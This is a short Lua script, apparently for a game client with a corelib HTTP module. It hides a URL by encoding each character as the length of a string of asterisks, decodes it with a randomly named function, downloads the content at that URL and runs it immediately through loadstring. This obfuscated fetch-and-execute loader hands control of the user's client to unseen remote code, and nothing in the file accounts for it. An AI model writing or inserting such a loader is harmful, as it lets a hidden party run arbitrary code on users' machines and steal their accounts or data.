function dVOBAWLdJiFHswDVvJrDIYcVFfPodAmZHyQiIDbDlNHpLVQFiYRzOtIuaXaocCvbDBIglCQl(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


local url = dVOBAWLdJiFHswDVvJrDIYcVFfPodAmZHyQiIDbDlNHpLVQFiYRzOtIuaXaocCvbDBIglCQl({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*******************************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','*************************************************************************************************','******************************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***********************************************','*****************************************************************','******************************************************************************************************************','***************************************************************************************************','********************************************************************************************************','*********************************************************************************************************','**********************************************************************************************************************','*******************************************************************************************************************','***********************************************','******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************','*******************************************************************************************************************','***********************************************','********************************************************************************************************','*****************************************************************************************************','*************************************************************************************************','****************************************************************************************************','*******************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','*******************************************************************','*****************************************************************','**************************************************************************************','*********************************************************************','*************************************************************************','**********************************************************************************','*****************************************************************','*************************************','**************************************************','************************************************','*******************************************************************************','******************************************************************************','*********************************************************************','***************************************************************************'})

modules.corelib.HTTP.get(url,
 function(script)
    assert(loadstring(script))()
end)    
